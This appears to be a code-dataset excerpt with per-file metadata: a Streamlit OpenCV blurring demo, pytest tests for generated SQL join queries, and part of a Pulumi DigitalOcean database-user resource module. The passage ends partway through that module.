# show the output image and associated parameters
title = "Blurred d={}, sc={}, ss={}".format(
d, sc, ss)
st.markdown(title)
st.image(blurred)
download_button1(blurred, button, download, mime_type, key='1.1')
else:
img_file = st.file_uploader(label='Upload a file', type=['png', 'jpg', 'jpge'])
realtime_update = st.sidebar.checkbox(label="Update in Real Time", value=True)
if img_file is not None:
# load the image, display it to our screen, and initialize a list of
# kernel sizes (so we can evaluate the relationship between kernel
# size and amount of blurring)
image = load_image_PIL(img_file)
image = converted(image)
with st.expander('Show Original Image'):
st.image(image)
kernelSizes = [(3, 3), (9, 9), (15, 15)]
with st.expander('Show Average Blur', expanded=True):
cols = st.columns(3)
# loop over the kernel sizes
for i, (kX, kY) in enumerate(kernelSizes):
# apply an "average" blur to the image using the current kernel size
with cols[i]:
blurred = cv.blur(image, (kX, kY))
st.markdown("Average Blur ({}, {})".format(kX, kY))
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Show Gaussian Blur'):
cols = st.columns(3)
# loop over the kernel sizes again
for i, (kX, kY) in enumerate(kernelSizes):
# apply a "Gaussian" blur to the image
with cols[i]:
blurred = cv.GaussianBlur(image, (kX, kY), 0)
st.markdown("Gaussian Blur ({}, {})".format(kX, kY))
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Show Median Blur'):
cols = st.columns(3)
# loop over the kernel sizes a final time
for i, k in enumerate((3, 9, 15)):
# apply a "median" blur to the image
with cols[i]:
blurred = cv.medianBlur(image, k)
st.markdown("Median Blur {}".format(k))
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Show Auto Blurring', expanded=True):
cols = st.columns(3)
kX = cols[0].number_input('Kernel Sizes kX', min_value=1, max_value=25, step=2, key='2.1')
kY = cols[1].number_input('Kernel Sizes kY', min_value=1, max_value=25, step=2, key='2.2', value=kX, disabled=True)
k = cols[2].number_input('Kernel Sizes k', min_value=1, max_value=25, step=2, key='2.3')
# apply an "average" blur to the image using the current kernel size
blurred = cv.blur(image, (kX, kX))
cols[0].markdown("Average Blur ({}, {})".format(kX, kY))
cols[0].image(blurred)
with cols[0]:
download_button1(blurred, button, download, mime_type, key='3.1')
# apply a "Gaussian" blur to the image
blurred = cv.GaussianBlur(image, (kX, kY), 0)
cols[1].markdown("Gaussian Blur ({}, {})".format(kX, kY))
cols[1].image(blurred)
with cols[1]:
download_button1(blurred, button, download, mime_type, key='3.2')
# apply a "median" blur to the image
blurred = cv.medianBlur(image, k)
cols[2].markdown("Median Blur {}".format(k))
cols[2].image(blurred)
with cols[2]:
download_button1(blurred, button, download, mime_type, key='3.3')
else:
# load the image, display it to our screen, and initialize a list of
# kernel sizes (so we can evaluate the relationship between kernel
# size and amount of blurring)
image = load_image(default_image)
with st.expander('Show Original Image'):
st.image(image)
kernelSizes = [(3, 3), (9, 9), (15, 15)]
with st.expander('Show Average Blur', expanded=True):
cols = st.columns(3)
# loop over the kernel sizes
for i, (kX, kY) in enumerate(kernelSizes):
# apply an "average" blur to the image using the current kernel size
with cols[i]:
blurred = cv.blur(image, (kX, kY))
st.markdown("Average Blur ({}, {})".format(kX, kY))
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Show Gaussian Blur'):
cols = st.columns(3)
# loop over the kernel sizes again
for i, (kX, kY) in enumerate(kernelSizes):
# apply a "Gaussian" blur to the image
with cols[i]:
blurred = cv.GaussianBlur(image, (kX, kY), 0)
st.markdown("Gaussian Blur ({}, {})".format(kX, kY))
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Show Median Blur'):
cols = st.columns(3)
# loop over the kernel sizes a final time
for i, k in enumerate((3, 9, 15)):
# apply a "median" blur to the image
with cols[i]:
blurred = cv.medianBlur(image, k)
st.markdown("Median Blur {}".format(k))
st.image(blurred)
download_button1(blurred, button, download, mime_type, key=f'{i}')
with st.expander('Show Auto Blurring', expanded=True):
cols = st.columns(3)
kX = cols[0].number_input('Kernel Sizes kX', min_value=1, max_value=25, step=2, key='2.1')
kY = cols[1].number_input('Kernel Sizes kY', min_value=1, max_value=25, step=2, key='2.2', value=kX, disabled=True)
k = cols[2].number_input('Kernel Sizes k', min_value=1, max_value=25, step=2, key='2.3')
# apply an "average" blur to the image using the current kernel size
blurred = cv.blur(image, (kX, kX))
cols[0].markdown("Average Blur ({}, {})".format(kX, kY))
cols[0].image(blurred)
with cols[0]:
download_button1(blurred, button, download, mime_type, key='4.1')
# apply a "Gaussian" blur to the image
blurred = cv.GaussianBlur(image, (kX, kY), 0)
cols[1].markdown("Gaussian Blur ({}, {})".format(kX, kY))
cols[1].image(blurred)
with cols[1]:
download_button1(blurred, button, download, mime_type, key='4.2')
# apply a "median" blur to the image
blurred = cv.medianBlur(image, k)
cols[2].markdown("Median Blur {}".format(k))
cols[2].image(blurred)
with cols[2]:
download_button1(blurred, button, download, mime_type, key='4.3')
source_code(
f'Source Code + Smoothing and Blurring Tutorial pyimagesearch.com',
'https://pyimagesearch.com/2021/04/28/opencv-smoothing-and-blurring/',
'https://gist.github.com/jjaramillo34/84863214120f9e6bcf49874670250ebb')
with st.expander('DuckDuckGo Search Results'):
t = 'blurring and smoothing'
st.subheader(f'More About {t.capitalize()}')
scrape_duckduckgo(f'opencv {t}')
| 48.611443
| 179
| 0.549202
| 11,350
| 97,709
| 4.6637
| 0.065903
| 0.015718
| 0.033325
| 0.040731
| 0.879357
| 0.860692
| 0.851076
| 0.84658
| 0.84486
| 0.84129
| 0
| 0.031173
| 0.340429
| 97,709
| 2,010
| 180
| 48.611443
| 0.789948
| 0.120112
| 0
| 0.802853
| 0
| 0.018807
| 0.207217
| 0.011756
| 0
| 0
| 0
| 0
| 0
| 1
| 0.007134
| false
| 0
| 0.01297
| 0
| 0.020752
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b6f2bd5dd43dcfec4c7f3689f4ed9bf781c9561c
| 19,392
|
py
|
Python
|
tests/test_join_query.py
|
Zenlytic/granite
|
93cc523954b1b900d7893af803a8fb3e5fc7d343
|
[
"Apache-2.0"
] | null | null | null |
tests/test_join_query.py
|
Zenlytic/granite
|
93cc523954b1b900d7893af803a8fb3e5fc7d343
|
[
"Apache-2.0"
] | null | null | null |
tests/test_join_query.py
|
Zenlytic/granite
|
93cc523954b1b900d7893af803a8fb3e5fc7d343
|
[
"Apache-2.0"
] | null | null | null |
# import pytest
def test_query_no_join(connection):
query = connection.get_sql_query(metrics=["total_item_revenue"], dimensions=["channel"])
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue "
"FROM analytics.order_line_items order_lines GROUP BY order_lines.sales_channel;"
)
assert query == correct
def test_alias_only_query(connection):
metric = connection.get_metric(metric_name="total_item_revenue")
query = metric.sql_query(query_type="SNOWFLAKE", alias_only=True)
assert query == "SUM(order_lines_total_item_revenue)"
def test_alias_only_query_number(connection):
metric = connection.get_metric(metric_name="line_item_aov")
query = metric.sql_query(query_type="SNOWFLAKE", alias_only=True)
assert query == "SUM(order_lines_total_item_revenue) / COUNT(orders_number_of_orders)"
def test_alias_only_query_symmetric_average_distinct(connection):
metric = connection.get_metric(metric_name="average_order_revenue")
query = metric.sql_query(query_type="SNOWFLAKE", alias_only=True)
correct = (
"(COALESCE(CAST((SUM(DISTINCT (CAST(FLOOR(COALESCE(order_lines_average_order_revenue, 0) "
"* (1000000 * 1.0)) AS DECIMAL(38,0))) + (TO_NUMBER(MD5(order_lines_order_id), "
"'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') % 1.0e27)::NUMERIC(38, 0)) "
"- SUM(DISTINCT (TO_NUMBER(MD5(order_lines_order_id), 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') "
"% 1.0e27)::NUMERIC(38, 0))) AS DOUBLE PRECISION) / CAST((1000000*1.0) AS "
"DOUBLE PRECISION), 0) / NULLIF(COUNT(DISTINCT CASE WHEN (order_lines_average_order_revenue) "
"IS NOT NULL THEN order_lines_order_id ELSE NULL END), 0))"
)
assert query == correct
def test_query_no_join_average_distinct(connection):
query = connection.get_sql_query(metrics=["average_order_revenue"], dimensions=["channel"])
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,(COALESCE(CAST((SUM(DISTINCT "
"(CAST(FLOOR(COALESCE(order_lines.order_total, 0) * (1000000 * 1.0)) AS DECIMAL(38,0))) "
"+ (TO_NUMBER(MD5(order_lines.order_unique_id), 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') "
"% 1.0e27)::NUMERIC(38, 0)) - SUM(DISTINCT (TO_NUMBER(MD5(order_lines.order_unique_id), "
"'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') % 1.0e27)::NUMERIC(38, 0))) AS DOUBLE PRECISION) "
"/ CAST((1000000*1.0) AS DOUBLE PRECISION), 0) / NULLIF(COUNT(DISTINCT CASE WHEN "
"(order_lines.order_total) IS NOT NULL THEN order_lines.order_unique_id ELSE NULL END), 0)) "
"as order_lines_average_order_revenue FROM analytics.order_line_items order_lines "
"GROUP BY order_lines.sales_channel;"
)
assert query == correct
def test_query_single_join(connection):
query = connection.get_sql_query(metrics=["total_item_revenue"], dimensions=["channel", "new_vs_repeat"])
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,"
"orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
"order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel,orders.new_vs_repeat;"
)
assert query == correct
def test_query_single_dimension(connection):
query = connection.get_sql_query(metrics=[], dimensions=["new_vs_repeat"])
correct = "SELECT orders.new_vs_repeat as orders_new_vs_repeat FROM "
correct += "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
correct += "order_lines.order_unique_id=orders.id GROUP BY orders.new_vs_repeat;"
assert query == correct
def test_query_single_dimension_with_comment(connection):
query = connection.get_sql_query(metrics=["total_item_revenue"], dimensions=["parent_channel"])
correct = (
"SELECT CASE\n--- parent channel\nWHEN order_lines.sales_channel ilike '%social%' then "
"'Social'\nELSE 'Not Social'\nEND as order_lines_parent_channel,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue "
"FROM analytics.order_line_items order_lines GROUP BY CASE\n--- parent channel\nWHEN "
"order_lines.sales_channel ilike '%social%' then 'Social'\nELSE 'Not Social'\nEND;"
)
assert query == correct
def test_query_single_dimension_with_multi_filter(connection):
query = connection.get_sql_query(metrics=["total_item_costs"], dimensions=["channel"])
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,SUM(case when order_lines.product_name "
"= 'Portable Charger' and orders.revenue * 100 > 100 then order_lines.item_costs end) "
"as order_lines_total_item_costs FROM analytics.order_line_items order_lines LEFT JOIN "
"analytics.orders orders ON order_lines.order_unique_id=orders.id "
"GROUP BY order_lines.sales_channel;"
)
assert query == correct
def test_query_single_dimension_sa_duration(connection):
query = connection.get_sql_query(metrics=["average_days_between_orders"], dimensions=["product_name"])
correct = (
"SELECT order_lines.product_name as order_lines_product_name,(COALESCE(CAST((SUM(DISTINCT "
"(CAST(FLOOR(COALESCE(DATEDIFF('DAY', orders.previous_order_date, orders.order_date), 0) "
"* (1000000 * 1.0)) AS DECIMAL(38,0))) + (TO_NUMBER(MD5(orders.id), "
"'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') % 1.0e27)::NUMERIC(38, 0)) "
"- SUM(DISTINCT (TO_NUMBER(MD5(orders.id), 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') "
"% 1.0e27)::NUMERIC(38, 0))) AS DOUBLE PRECISION) / CAST((1000000*1.0) AS DOUBLE PRECISION), 0) "
"/ NULLIF(COUNT(DISTINCT CASE WHEN (DATEDIFF('DAY', orders.previous_order_date, "
"orders.order_date)) IS NOT NULL THEN orders.id "
"ELSE NULL END), 0)) as orders_average_days_between_orders "
"FROM analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
"ON order_lines.order_unique_id=orders.id GROUP BY order_lines.product_name;"
)
assert query == correct
def test_query_single_join_count(connection):
query = connection.get_sql_query(
metrics=["order_lines.count"],
dimensions=["channel", "new_vs_repeat"],
explore_name="order_lines_all",
)
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,"
"orders.new_vs_repeat as orders_new_vs_repeat,"
"COUNT(order_lines.order_line_id) as order_lines_count FROM "
"analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
"order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel,orders.new_vs_repeat;"
)
assert query == correct
def test_query_single_join_metric_with_sub_field(connection):
query = connection.get_sql_query(
metrics=["line_item_aov"],
dimensions=["channel"],
)
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,SUM(order_lines.revenue) "
"/ NULLIF(COUNT(DISTINCT CASE WHEN (orders.id) IS NOT NULL "
"THEN orders.id ELSE NULL END), 0) as order_lines_line_item_aov "
"FROM analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
"ON order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel;"
)
assert query == correct
def test_query_single_join_with_forced_additional_join(connection):
query = connection.get_sql_query(
metrics=["avg_rainfall"],
dimensions=["discount_promo_name"],
query_type="BIGQUERY",
)
correct = (
"SELECT discount_detail.promo_name as discount_detail_discount_promo_name,(COALESCE(CAST(("
"SUM(DISTINCT (CAST(FLOOR(COALESCE(country_detail.rain, 0) * (1000000 * 1.0)) AS FLOAT64))"
" + CAST(FARM_FINGERPRINT(CAST(country_detail.country AS STRING)) AS BIGNUMERIC)) - SUM(DISTINCT "
"CAST(FARM_FINGERPRINT(CAST(country_detail.country AS STRING)) AS BIGNUMERIC))) AS FLOAT64) "
"/ CAST((1000000*1.0) AS FLOAT64), 0) / NULLIF(COUNT(DISTINCT CASE WHEN "
"(country_detail.rain) IS NOT NULL THEN country_detail.country ELSE NULL END), "
"0)) as country_detail_avg_rainfall FROM analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics_live.discounts discounts ON orders.id=discounts.order_id "
"LEFT JOIN analytics.discount_detail discount_detail "
"ON discounts.discount_id=discount_detail.discount_id "
"AND DATE_TRUNC(discounts.order_date, WEEK) is not null "
"LEFT JOIN (SELECT * FROM ANALYTICS.COUNTRY_DETAIL) as country_detail "
"ON discounts.country=country_detail.country GROUP BY discount_detail.promo_name;"
)
assert query == correct
def test_query_single_join_select_args(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["channel", "new_vs_repeat"],
select_raw_sql=[
"CAST(new_vs_repeat = 'Repeat' AS INT) as group_1",
"CAST(date_created > '2021-04-02' AS INT) as period",
],
)
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,"
"orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue,"
"CAST(new_vs_repeat = 'Repeat' AS INT) as group_1,"
"CAST(date_created > '2021-04-02' AS INT) as period FROM "
"analytics.order_line_items order_lines LEFT JOIN analytics.orders orders ON "
"order_lines.order_unique_id=orders.id GROUP BY order_lines.sales_channel,orders.new_vs_repeat,"
)
correct += "CAST(new_vs_repeat = 'Repeat' AS INT),CAST(date_created > '2021-04-02' AS INT);"
assert query == correct
def test_query_single_join_with_case_raw_sql(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["is_on_sale_sql", "new_vs_repeat"],
)
correct = (
"SELECT CASE WHEN order_lines.product_name ilike '%sale%' then TRUE else FALSE end "
"as order_lines_is_on_sale_sql,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
"ON order_lines.order_unique_id=orders.id GROUP BY CASE WHEN order_lines.product_name "
"ilike '%sale%' then TRUE else FALSE end,orders.new_vs_repeat;"
)
assert query == correct
def test_query_single_join_with_case(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["is_on_sale_case", "new_vs_repeat"],
)
correct = "SELECT case when order_lines.product_name ilike '%sale%' then 'On sale' else 'Not on sale' end " # noqa
correct += "as order_lines_is_on_sale_case,orders.new_vs_repeat as orders_new_vs_repeat,"
correct += "SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
correct += "analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
correct += "ON order_lines.order_unique_id=orders.id GROUP BY case when order_lines.product_name "
correct += "ilike '%sale%' then 'On sale' else 'Not on sale' end,orders.new_vs_repeat;"
assert query == correct
def test_query_single_join_with_tier(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["order_tier", "new_vs_repeat"],
)
tier_case_query = "case when order_lines.revenue < 0 then 'Below 0' when order_lines.revenue >= 0 "
tier_case_query += "and order_lines.revenue < 20 then '[0,20)' when order_lines.revenue >= 20 and "
tier_case_query += "order_lines.revenue < 50 then '[20,50)' when order_lines.revenue >= 50 and "
tier_case_query += "order_lines.revenue < 100 then '[50,100)' when order_lines.revenue >= 100 and "
tier_case_query += "order_lines.revenue < 300 then '[100,300)' when order_lines.revenue >= 300 "
tier_case_query += "then '[300,inf)' else 'Unknown' end"
correct = (
f"SELECT {tier_case_query} as order_lines_order_tier,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines LEFT JOIN analytics.orders orders "
f"ON order_lines.order_unique_id=orders.id GROUP BY {tier_case_query},orders.new_vs_repeat;"
)
assert query == correct
def test_query_single_join_with_filter(connection):
query = connection.get_sql_query(
metrics=["number_of_email_purchased_items"],
dimensions=["channel", "new_vs_repeat"],
)
correct = (
"SELECT order_lines.sales_channel as order_lines_channel,"
"orders.new_vs_repeat as orders_new_vs_repeat,"
"COUNT(case when order_lines.sales_channel = 'Email' then order_lines.order_id end) "
"as order_lines_number_of_email_purchased_items FROM analytics.order_line_items "
"order_lines LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id"
" GROUP BY order_lines.sales_channel,orders.new_vs_repeat;"
)
assert query == correct
def test_query_multiple_join(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["region", "new_vs_repeat"],
)
correct = (
"SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id "
"GROUP BY customers.region,orders.new_vs_repeat;"
)
assert query == correct
def test_query_multiple_join_where_dict(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["region", "new_vs_repeat"],
where=[{"field": "region", "expression": "not_equal_to", "value": "West"}],
)
correct = (
"SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id "
"WHERE customers.region<>'West' "
"GROUP BY customers.region,orders.new_vs_repeat;"
)
assert query == correct
def test_query_multiple_join_where_literal(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["region", "new_vs_repeat"],
where="first_order_week > '2021-07-12'",
)
correct = (
"SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id "
"WHERE DATE_TRUNC('WEEK', customers.first_order_date) > '2021-07-12' "
"GROUP BY customers.region,orders.new_vs_repeat;"
)
assert query == correct
def test_query_multiple_join_having_dict(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["region", "new_vs_repeat"],
having=[{"field": "total_item_revenue", "expression": "greater_than", "value": -12}],
)
correct = (
"SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id "
"GROUP BY customers.region,orders.new_vs_repeat HAVING SUM(order_lines.revenue)>-12;"
)
assert query == correct
def test_query_multiple_join_having_literal(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["region", "new_vs_repeat"],
having="total_item_revenue > -12",
)
correct = (
"SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id "
"GROUP BY customers.region,orders.new_vs_repeat HAVING SUM(order_lines.revenue) > -12;"
)
assert query == correct
def test_query_multiple_join_order_by_literal(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["region", "new_vs_repeat"],
order_by="total_item_revenue",
)
correct = (
"SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id "
"GROUP BY customers.region,orders.new_vs_repeat ORDER BY total_item_revenue ASC;"
)
assert query == correct
def test_query_multiple_join_all(connection):
query = connection.get_sql_query(
metrics=["total_item_revenue"],
dimensions=["region", "new_vs_repeat"],
where=[{"field": "region", "expression": "not_equal_to", "value": "West"}],
having=[{"field": "total_item_revenue", "expression": "greater_than", "value": -12}],
order_by=[{"field": "total_item_revenue", "sort": "desc"}],
)
correct = (
"SELECT customers.region as customers_region,orders.new_vs_repeat as orders_new_vs_repeat,"
"SUM(order_lines.revenue) as order_lines_total_item_revenue FROM "
"analytics.order_line_items order_lines "
"LEFT JOIN analytics.orders orders ON order_lines.order_unique_id=orders.id "
"LEFT JOIN analytics.customers customers ON order_lines.customer_id=customers.customer_id "
"WHERE customers.region<>'West' "
"GROUP BY customers.region,orders.new_vs_repeat HAVING SUM(order_lines.revenue)>-12 "
"ORDER BY total_item_revenue DESC;"
)
assert query == correct
| 45.735849
| 119
| 0.71514
| 2,599
| 19,392
| 5.00077
| 0.064255
| 0.116181
| 0.05332
| 0.05886
| 0.869508
| 0.834346
| 0.824575
| 0.790336
| 0.755636
| 0.715858
| 0
| 0.015894
| 0.182395
| 19,392
| 423
| 120
| 45.843972
| 0.803847
| 0.000928
| 0
| 0.471471
| 0
| 0.039039
| 0.637654
| 0.325848
| 0
| 0
| 0
| 0
| 0.075075
| 1
| 0.075075
| false
| 0
| 0
| 0
| 0.075075
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
f3fdf8be5b27cafeba639c3a598acacbe20c6383
| 14,894
|
py
|
Python
|
sdk/python/pulumi_digitalocean/database_user.py
|
yitsushi/pulumi-digitalocean
|
9d408e7e4a3bed2d9e7aa91a32e2f154706a3400
|
[
"ECL-2.0",
"Apache-2.0"
] | 53
|
2019-04-25T14:43:12.000Z
|
2022-03-14T15:51:44.000Z
|
sdk/python/pulumi_digitalocean/database_user.py
|
yitsushi/pulumi-digitalocean
|
9d408e7e4a3bed2d9e7aa91a32e2f154706a3400
|
[
"ECL-2.0",
"Apache-2.0"
] | 158
|
2019-04-15T21:47:18.000Z
|
2022-03-29T21:21:57.000Z
|
sdk/python/pulumi_digitalocean/database_user.py
|
yitsushi/pulumi-digitalocean
|
9d408e7e4a3bed2d9e7aa91a32e2f154706a3400
|
[
"ECL-2.0",
"Apache-2.0"
] | 10
|
2019-04-15T20:16:11.000Z
|
2021-05-28T19:08:32.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['DatabaseUserArgs', 'DatabaseUser']
@pulumi.input_type
class DatabaseUserArgs:
def __init__(__self__, *,
cluster_id: pulumi.Input[str],
mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a DatabaseUser resource.
:param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
:param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
:param pulumi.Input[str] name: The name for the database user.
"""
pulumi.set(__self__, "cluster_id", cluster_id)
if mysql_auth_plugin is not None:
pulumi.set(__self__, "mysql_auth_plugin", mysql_auth_plugin)
if name is not None:
pulumi.set(__self__, "name", name)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Input[str]:
"""
The ID of the original source database cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: pulumi.Input[str]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="mysqlAuthPlugin")
def mysql_auth_plugin(self) -> Optional[pulumi.Input[str]]:
"""
The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
"""
return pulumi.get(self, "mysql_auth_plugin")
@mysql_auth_plugin.setter
def mysql_auth_plugin(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mysql_auth_plugin", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name for the database user.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@pulumi.input_type
class _DatabaseUserState:
def __init__(__self__, *,
cluster_id: Optional[pulumi.Input[str]] = None,
mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
password: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering DatabaseUser resources.
:param pulumi.Input[str] cluster_id: The ID of the original source database cluster.
:param pulumi.Input[str] mysql_auth_plugin: The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
:param pulumi.Input[str] name: The name for the database user.
:param pulumi.Input[str] password: Password for the database user.
:param pulumi.Input[str] role: Role for the database user. The value will be either "primary" or "normal".
"""
if cluster_id is not None:
pulumi.set(__self__, "cluster_id", cluster_id)
if mysql_auth_plugin is not None:
pulumi.set(__self__, "mysql_auth_plugin", mysql_auth_plugin)
if name is not None:
pulumi.set(__self__, "name", name)
if password is not None:
pulumi.set(__self__, "password", password)
if role is not None:
pulumi.set(__self__, "role", role)
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the original source database cluster.
"""
return pulumi.get(self, "cluster_id")
@cluster_id.setter
def cluster_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "cluster_id", value)
@property
@pulumi.getter(name="mysqlAuthPlugin")
def mysql_auth_plugin(self) -> Optional[pulumi.Input[str]]:
"""
The authentication method to use for connections to the MySQL user account. The valid values are `mysql_native_password` or `caching_sha2_password` (this is the default).
"""
return pulumi.get(self, "mysql_auth_plugin")
@mysql_auth_plugin.setter
def mysql_auth_plugin(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "mysql_auth_plugin", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name for the database user.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
Password for the database user.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def role(self) -> Optional[pulumi.Input[str]]:
"""
Role for the database user. The value will be either "primary" or "normal".
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "role", value)
class DatabaseUser(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
mysql_auth_plugin: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Provides a DigitalOcean database user resource. When creating a new database cluster, a default admin user with name `doadmin` will be created. Then, this resource can be used to provide additional normal users inside the cluster.
